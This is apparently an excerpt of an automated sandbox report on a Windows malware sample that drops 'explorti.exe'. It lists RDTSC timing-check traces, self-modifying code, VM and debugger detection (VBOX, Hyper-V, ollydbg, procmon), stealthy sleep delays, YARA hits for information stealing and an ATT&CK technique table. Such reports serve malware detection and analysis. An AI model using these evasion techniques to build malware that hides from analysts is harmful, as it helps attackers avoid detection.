                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BBB second address: 4A10BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BC1 second address: 4A10BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BC7 second address: 4A10BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FFAAD0A8F20h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, dx 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BF5 second address: 4A10BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A1C second address: 4A10A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A20 second address: 4A10A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80B8E second address: 4A80BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80BAB second address: 4A80BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80BB0 second address: 4A80BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FFAAD0A8F1Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FFAAD0A8F1Eh 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80BDB second address: 4A80BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80BDF second address: 4A80BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80BE5 second address: 4A80C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FFAACBEF8D0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFAACBEF8D7h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80016 second address: 4A800B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 251EFC2Bh 0x00000010 pushfd 0x00000011 jmp 00007FFAAD0A8F20h 0x00000016 sub eax, 25BB43B8h 0x0000001c jmp 00007FFAAD0A8F1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FFAAD0A8F1Fh 0x0000002b sbb eax, 4E3C7D7Eh 0x00000031 jmp 00007FFAAD0A8F29h 0x00000036 popfd 0x00000037 mov dl, ah 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b jmp 00007FFAAD0A8F23h 0x00000040 mov ebp, esp 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFAAD0A8F25h 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A800B2 second address: 4A800D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8CDh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A800D7 second address: 4A800E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A800E7 second address: 4A800EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E09 second address: 4A10E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E0F second address: 4A10E32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov ch, A4h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E32 second address: 4A10E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E36 second address: 4A10E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E52 second address: 4A10E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, di 0x00000013 mov ch, dh 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A803CC second address: 4A803E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A803E1 second address: 4A80436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAAD0A8F27h 0x00000009 jmp 00007FFAAD0A8F23h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 jmp 00007FFAAD0A8F20h 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FFAAD0A8F1Dh 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80436 second address: 4A80462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8CEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80462 second address: 4A80466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80466 second address: 4A8046A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8046A second address: 4A80470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80470 second address: 4A80477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80477 second address: 4A80489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dl, 12h 0x0000000f mov ah, B3h 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80489 second address: 4A804A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, 7A0Ch 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A804A2 second address: 4A80500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAAD0A8F20h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push A706B1DBh 0x00000012 jmp 00007FFAAD0A8F1Dh 0x00000017 add dword ptr [esp], 58FA4E27h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bh, 23h 0x00000023 pushfd 0x00000024 jmp 00007FFAAD0A8F24h 0x00000029 adc ecx, 7A478FB8h 0x0000002f jmp 00007FFAAD0A8F1Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80500 second address: 4A80518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80561 second address: 4A80579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F24h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80579 second address: 4A80590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop ebx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E9FE second address: F7EA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EA04 second address: F7EA23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d ja 00007FFAACBEF8CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EA23 second address: F7EA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FFAAD0A8F25h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A302A1 second address: 4A302A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A302A5 second address: 4A302AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A302AB second address: 4A302ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8CCh 0x00000008 call 00007FFAACBEF8D2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAACBEF8D8h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A302ED second address: 4A302F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A302F1 second address: 4A302F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A302F7 second address: 4A30308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30308 second address: 4A3033A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov ebx, ecx 0x00000011 mov bh, ch 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFAACBEF8CEh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3033A second address: 4A30353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30353 second address: 4A30357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30357 second address: 4A30369 instructions: 0x00000000 rdtsc 0x00000002 mov dl, 24h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push 35755477h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30369 second address: 4A30377 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30377 second address: 4A3037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30511 second address: 4A30538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8D5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DCECD5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F73156 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F9B76F instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 100090D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 59ECD5 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 743156 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 76B76F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 7D090D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A803B5 rdtsc 0_2_04A803B5
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 1387Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 511Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 1004Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 1235Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8172Thread sleep time: -58029s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8144Thread sleep count: 1387 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8144Thread sleep time: -2775387s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8108Thread sleep count: 511 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8108Thread sleep time: -15330000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3736Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8128Thread sleep count: 1004 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8128Thread sleep time: -2009004s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8136Thread sleep count: 1235 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8136Thread sleep time: -2471235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6<C
                    Source: file.exe, 00000000.00000002.1711517726.0000000000F50000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1739917497.0000000000720000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000002.00000002.1740152344.0000000000720000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A803B5 rdtsc 0_2_04A803B5
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0056645B mov eax, dword ptr fs:[00000030h]6_2_0056645B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0056A1C2 mov eax, dword ptr fs:[00000030h]6_2_0056A1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: LProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0054D312 cpuid 6_2_0054D312
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeQueries volume information: C:\Users\user\AppData\Roaming\1000051000\08d3f7ce12.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeQueries volume information: C:\Users\user\AppData\Roaming\1000052000\c840affdc0.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_0054CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_0054CB1A

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 6.2.explorti.exe.530000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.explorti.exe.530000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.explorti.exe.530000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.d60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000003.1699866762.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1699390143.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1740065067.0000000000531000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2279702263.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1711456271.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1739755921.0000000000531000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1670647097.0000000004870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    11
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
